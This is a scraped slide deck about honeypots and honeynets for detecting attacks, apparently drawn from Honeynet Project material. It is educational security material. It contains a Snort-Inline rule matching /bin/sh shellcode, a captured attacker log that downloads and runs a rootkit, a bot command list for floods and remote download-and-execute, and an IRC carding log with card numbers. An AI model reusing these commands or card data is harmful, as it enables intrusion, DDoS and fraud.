Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024Designing IA for AI - Information Architecture Conference 2024
Designing IA for AI - Information Architecture Conference 2024
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 Presentation
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
DevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache MavenDevoxxFR 2024 Reproducible Builds with Apache Maven
DevoxxFR 2024 Reproducible Builds with Apache Maven
 
What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024What's New in Teams Calling, Meetings and Devices March 2024
What's New in Teams Calling, Meetings and Devices March 2024
 
Developer Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQLDeveloper Data Modeling Mistakes: From Postgres to NoSQL
Developer Data Modeling Mistakes: From Postgres to NoSQL
 
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry InnovationBeyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
Beyond Boundaries: Leveraging No-Code Solutions for Industry Innovation
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan"ML in Production",Oleksandr Bagan
"ML in Production",Oleksandr Bagan
 
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
"Subclassing and Composition – A Pythonic Tour of Trade-Offs", Hynek Schlawack
 
Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!Nell’iperspazio con Rocket: il Framework Web di Rust!
Nell’iperspazio con Rocket: il Framework Web di Rust!
 
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptxE-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
E-Vehicle_Hacking_by_Parul Sharma_null_owasp.pptx
 

Honeypot technology for detecting new attacks

  • 1. Honeypot New technology for the security community By Tahoora Ketabdar
  • 2.
  • 3. IDS
  • 4.
  • 5.
  • 6.
  • 7.
  • 8.
  • 9.
  • 10.
  • 11.
  • 12.
  • 13.
  • 14. Snapshot of the Specter GUI Alert box هر حمله اي كه رخ داد ليست ميشود Status Personality Remote log intelligence gathering help
  • 15.
  • 16.
  • 17.
  • 18.  
  • 19.
  • 20.
  • 21.
  • 23.
  • 26.
  • 27.
  • 28.
  • 30.
  • 31. NIDS
  • 34. Snort-Inline alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:&quot;DNS EXPLOIT named&quot;;flags: A+; content:&quot;|CD80 E8D7 FFFFFF|/bin/sh&quot;; alert tcp $EXTERNAL_NET any -> $HOME_NET 53 (msg:&quot;DNS EXPLOIT named&quot;;flags: A+; content:&quot;|CD80 E8D7 FFFFFF|/bin/sh&quot;; replace: &quot;| 0000 E8D7 FFFFFF|/ ben/sh &quot;;)
  • 35.
  • 36.
  • 38.
  • 39.
  • 40.
  • 41.
  • 42.
  • 46.
  • 47.
  • 50.
  • 55. Processes مي تواند تصوير گراف پروسه ها را نيز رسم كند
  • 56. Files
  • 58. Honeynets and The Honeynet Project
  • 59.  
  • 60.  
  • 61.
  • 62.
  • 64.
  • 65.
  • 66.
  • 67.
  • 68.
  • 69.
  • 71.
  • 72.
  • 74.
  • 75. DDoS for Money J4ck: why don't you start charging for packet attacks? J4ck: &quot;give me x amount and I'll take bla bla offline for this amount of time” J1LL: it was illegal last I checked J4ck: heh, then everything you do is illegal. Why not make money off of it? J4ck: I know plenty of people that'd pay exorbatent amounts for packeting
  • 76.
  • 77.
  • 78.
  • 79. The Old Days Jan 8 18:48:12 HISTORY: PID=1246 UID=0 lynx www.becys.org/LUCKROOT.TAR Jan 8 18:48:31 HISTORY: PID=1246 UID=0 y Jan 8 18:48:45 HISTORY: PID=1246 UID=0 tar -xvfz LUCKROOT.TAR Jan 8 18:48:59 HISTORY: PID=1246 UID=0 tar -xzvf Lu Jan 8 18:49:01 HISTORY: PID=1246 UID=0 tar -xzvf L Jan 8 18:49:03 HISTORY: PID=1246 UID=0 tar -xzvf LUCKROOT.TAR Jan 8 18:49:06 HISTORY: PID=1246 UID=0 cd luckroot Jan 8 18:49:13 HISTORY: PID=1246 UID=0 ./luckgo 216 210 Jan 8 18:51:07 HISTORY: PID=1246 UID=0 ./luckgo 200 120 Jan 8 18:51:43 HISTORY: PID=1246 UID=0 ./luckgo 64 120 Jan 8 18:52:00 HISTORY: PID=1246 UID=0 ./luckgo 216 200
  • 80.
  • 81.
  • 82.
  • 83. Bots ddos.synflood [host] [time] [delay] [port] starts an SYN flood ddos.httpflood [url] [number] [referrer] [recursive = true||false] starts a HTTP flood scan.listnetranges list scanned netranges scan.start starts all enabled scanners scan.stop stops all scanners http.download download a file via HTTP http.execute updates the bot via the given HTTP URL http.update executes a file from a given HTTP URL cvar.set spam_aol_channel [channel] AOL Spam - Channel name cvar.set spam_aol_enabled [1/0] AOL Spam - Enabled?
  • 84.
  • 85.
  • 86.
  • 89.
  • 90.
  • 91. Credit Cards Exchanging 04:55:16 COCO_JAA: !cc 04:55:23 {Chk}: 0,19(0 COCO_JAA 9)0 CC for U :4,1 Bob Johns|P. O. Box 126|Wendel, CA 25631|United States|510-863-4884|4407070000588951 06/05 (All This ccs update everyday From My Hacked shopping Database - You must regular come here for got all this ccs) 8*** 9(11 TraDecS Chk_Bot FoR #goldcard9) 04:55:42 COCO_JAA: !cclimit 4407070000588951 04:55:46 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur MasterCard (5407070000788951) : 0.881 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel) 04:56:55 COCO_JAA: !cardablesite 04:57:22 COCO_JAA: !cardable electronics 04:57:27 {Chk}: 0,19(0 COCO_JAA 9)0 Site where you can card electronics : *** 9(11 TraDecS Chk_bot FoR #goldcard9) 04:58:09 COCO_JAA: !cclimit 4234294391131136 04:58:12 {Chk}: 0,19(0 COCO_JAA 9)0 Limit for Ur Visa (4264294291131136) : 9.697 $ (This Doesn't Mean Its Valid) 4*** 0(11 TraDecS Chk_bot FoR #channel)
  • 92.
  • 94.
  • 95.
  • 97.
  • 99. Sponsoring YOU? Advanced Network Management Lab
  • 100.
  • 101.
  • 102.

Notas del editor

  1. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  2. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  3. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  4. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  5. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  6. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  7. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  8. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  9. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  10. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  11. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  12. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  13. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  14. Even more exciting is the ability to disable attacks by modifying the packet payload. Here we disable the DNS attack by replacing the exploit code with different values. Even if the exploit is successful, they will end up executing /ben/sh, which does not exist on any system. This creates a more realistic environment for attackers. They launch an attack and the victim responds, however the attack fails. The attacker most likely never know why it failed. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  15. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  16. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  17. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  18. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  19. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  20. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  21. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  22. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  23. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  24. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  25. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  26. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  27. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  28. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  29. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  30. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  31. This is the agenda we will be following for today. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  32. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  33. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  34. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  35. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  36. Keep in mind this statistical information was gathered during 2000-2001. We fully believe that the threats on the Internet are exponentially more active due to the release of highly automated tools, such as worms and auto-rooters. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  37. We believe this to be a Romanian blackhat that lives on the east coast. His handle is thought to be ‘Johnny17’. The Honeynet Project captured this real time video as one of our Honeynets was under attack. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  38. After one of our Honeynets was compromised with the dtspcd exploit, the system was used for the attackers to communicate with each other. This was part of their conversation. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  39. Honeynets can detect activity on any protocol, increasing their chances of detecting previously unknown attacks. For example, a Honeynet was recently compromised and a backdoor was placed on the system. The backdoor used encoded IP protocol 11 packets for communication. This is a covert channel between the hacker and the compromised system. The Honeynet detected and captured this anomalous traffic and allowed us to analyze the attacker’s actions. Above we see the encoded covert communications sent by the attacker to the honeypot. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  40. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  41. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  42. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  43. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  44. Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)
  45. Feel free to contact the Honeynet Project with any idea, questions, or concerns you may have. If you are interested in learning more about information security in general, you can find books written by member of the Honeynet Project at http://www.honeynet.org/book/books.html Best of luck! --- The Honeynet Project --- Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com) Tahoora Ketabdar(Tahoora1988@gmail.com)